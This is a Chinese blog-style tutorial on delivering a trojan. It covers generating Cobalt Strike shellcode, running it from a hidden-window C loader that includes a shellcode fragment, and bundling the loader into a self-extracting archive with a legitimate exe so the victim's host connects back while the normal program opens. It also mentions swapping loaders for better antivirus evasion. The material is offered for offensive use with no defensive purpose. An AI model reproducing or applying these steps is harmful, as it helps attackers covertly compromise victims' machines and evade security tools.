这里演示的方式为shellcode框架加载自解压
1.生成shellcode
2.c加载(随便拉的加载器)#include
#include
#pragma comment(linker,”/subsystem:”windows”” /entry:””mainCRTStartup””””)
unsigned char shellcode[] =
“”xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8b””
“”x52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0″”
“”xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57″”;
void main()
{
((void(*)(void))&shellcode)();
}
3.自解压捆绑exe
当目标运行正常exe的同时会运行我们的木马
复现
使用cobaltstrike生成c的shellcode
使用vc6++打开
编译组建 生成exe
生成的exe文件位于桌面debug文件目录下
点击确认 生成捆绑马

软件正常打开 并且主机成功上线
这个加载器的免杀效果一般 大佬们可以自行替换
文章知识点与官方知识档案匹配,可进一步学习相关知识C技能树首页概览113143 人正在系统学习中 相关资源:TranslationLoaderBundle:具有数据库翻译加载器的Symfony2捆绑软件 ”
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!